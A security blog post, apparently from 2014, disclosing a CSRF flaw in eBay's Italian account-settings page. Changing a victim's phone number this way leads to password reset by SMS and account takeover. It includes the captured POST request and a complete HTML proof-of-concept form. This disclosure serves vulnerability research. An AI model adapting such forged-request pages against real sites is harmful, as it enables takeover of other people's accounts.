{"id":99,"date":"2014-07-26T11:12:47","date_gmt":"2014-07-26T09:12:47","guid":{"rendered":"https:\/\/hacksecproject.com\/?p=99"},"modified":"2018-11-23T17:00:16","modified_gmt":"2018-11-23T17:00:16","slug":"ebay-from-csrf-to-full-takeover-account-of-any-user","status":"publish","type":"post","link":"https:\/\/hacksecproject.com\/?p=99","title":{"rendered":"Ebay: From CSRF to Full Takeover Account of any user"},"content":{"rendered":"

After the Ebay Data Breach i started looking for that bug that may have been exploited from hackers to steal credentials of more that 100 million Ebay user’s account.So i focused my attention on the Ebay recovery account procedures.If you are already a Ebay user you can reset the password of your account through three procedures:<\/p>\n

1) Email Address:An email to the registered email-address will be sent with a reset link<\/p>\n

2)SMS: An SMS with a 4-digits PIN will be sent from Ebay to the registered phone number<\/p>\n

3)Phone call: A phone call will be made from Ebay to reset password of the Ebay user’s account<\/p>\n

The bug i found is in the SMS procedure.This CSRF bug allows me to set a new phone number in the victim’s account and subsequently i can use the SMS procedure to obtain the PIN to reset password of Ebay victim’s account.To set a new phone number in our Ebay account we have to:<\/p>\n

1)Go to https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll?ChangeRegistrationShow<\/a><\/p>\n

2)Fill in all the forms with the desired values<\/p>\n

3)Click on the button to save changes<\/p>\n

\"Schermata<\/a><\/p>\n

Once clicked on it a POST request like the following will be generated:<\/p>\n

POST\u00a0\u00a0 https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll<\/p>\n

Host: scgi.ebay.it
\nUser-Agent: myuseragent
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nReferer: https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll?ChangeRegistrationPreview
\nCookie: mycookies
\nConnection: keep-alive
\nContent-Type: application\/x-www-form-urlencoded
\nContent-Length: 758<\/p>\n

MfcISAPICommand=ChangeRegistration&userid=&pass=&mid=&hmid=&firstname=Andrea&lastname=Santese&middleinitial=&nameAlt=&nameAlt2=&name=Andrea++Santese&company=&address=via+A.AAAAA&city=Maglie&state=LE&fullnameAlt=&companyAlt=&addressAlt=11&cityAlt=&stateAlt=&zip=73024&country=Italia&countryid=101&dayphone=++32709869473270986947+&nightphone=+++&faxphone=&dayphone1=3270986948&dayphone2=&dayphone3=&dayphone4=&nightphone1=&nightphone2=&nightphone3=&nightphone4=&gender=Non+specificato&billingcurrency=7&personalId=&personalIdType=&bizTypeCode=&bizNumber1=&bizNumber2=&taxIdNumber=&accountOperatorName=&srt=01000100000040018e9fb8c3652034dfa260bc532183a8ddb8b0625bb39c554c5798fd1ae45a250dfdbd26d445eda420b25052c714e49cabe4a038ceee0436e85ec32fb6903c4f&salutation=<\/p>\n

The first time i look at this POST request i noticed that there was the “srt” parameter and i thought it was an anti-CSRF token but after few attempts i noticed that the “srt” parameter and its value are not checked from server so they can be omitted.So i realized an HTML page that once clicked by the victim, will set a new phone number (attacker’s phone number) in the victim’s account.<\/p>\n

This is the POC:<\/p>\n

<html><\/p>\n

<body><\/p>\n

<form method=”POST” name=”form0″ action=”https:\/\/scgi.ebay.it:443\/ws\/eBayISAPI.dll”>
\n<input type=”hidden” name=”MfcISAPICommand” value=”ChangeRegistration”\/>
\n<input type=”hidden” name=”userid” value=””\/>
\n<input type=”hidden” name=”pass” value=””\/>
\n<input type=”hidden” name=”mid” value=””\/>
\n<input type=”hidden” name=”hmid” value=””\/>
\n<input type=”hidden” name=”firstname” value=”firstname”\/>
\n<input type=”hidden” name=”lastname” value=”lastname”\/>
\n<input type=”hidden” name=”middleinitial” value=””\/>
\n<input type=”hidden” name=”nameAlt” value=””\/>
\n<input type=”hidden” name=”nameAlt2″ value=””\/>
\n<input type=”hidden” name=”name” value=”firstname lastname”\/>
\n<input type=”hidden” name=”company” value=””\/>
\n<input type=”hidden” name=”address” value=”via A.AAAAA”\/>
\n<input type=”hidden” name=”city” value=”city”\/>
\n<input type=”hidden” name=”state” value=”state”\/>
\n<input type=”hidden” name=”fullnameAlt” value=””\/>
\n<input type=”hidden” name=”companyAlt” value=””\/>
\n<input type=”hidden” name=”addressAlt” value=”11″\/>
\n<input type=”hidden” name=”cityAlt” value=””\/>
\n<input type=”hidden” name=”stateAlt” value=””\/>
\n<input type=”hidden” name=”zip” value=”zipcode”\/>
\n<input type=”hidden” name=”country” value=”Italia”\/>
\n<input type=”hidden” name=”countryid” value=”101″\/>
\n<input type=”hidden” name=”dayphone” value=”\u00a0 dayphonr”\/>
\n<input type=”hidden” name=”nightphone” value=””\/>
\n<input type=”hidden” name=”faxphone” value=””\/>
\n<input type=”hidden” name=”dayphone1″ value=”dayphone1″\/>
\n<input type=”hidden” name=”dayphone2″ value=””\/>
\n<input type=”hidden” name=”dayphone3″ value=””\/>
\n<input type=”hidden” name=”dayphone4″ value=””\/>
\n<input type=”hidden” name=”nightphone1″ value=””\/>
\n<input type=”hidden” name=”nightphone2″ value=””\/>
\n<input type=”hidden” name=”nightphone3″ value=””\/>
\n<input type=”hidden” name=”nightphone4″ value=””\/>
\n<input type=”hidden” name=”gender” value=”Non specificato”\/>
\n<input type=”hidden” name=”billingcurrency” value=”7″\/>
\n<input type=”hidden” name=”personalId” value=””\/>
\n<input type=”hidden” name=”personalIdType” value=””\/>
\n<input type=”hidden” name=”bizTypeCode” value=””\/>
\n<input type=”hidden” name=”bizNumber1″ value=””\/>
\n<input type=”hidden” name=”bizNumber2″ value=””\/>
\n<input type=”hidden” name=”taxIdNumber” value=””\/>
\n<input type=”hidden” name=”accountOperatorName” value=””\/>
\n<input type=”hidden” name=”salutation” value=””\/>
\n<\/form><\/p>\n

<\/body>
\n<\/html><\/p>\n

Once the victim has clicked on this HTML page a new phone number will be setted in the victim’s account and the attacker can subsequently reset password of the victim’s account through the SMS procedure.<\/p>\n

This is the Video PoC:
\n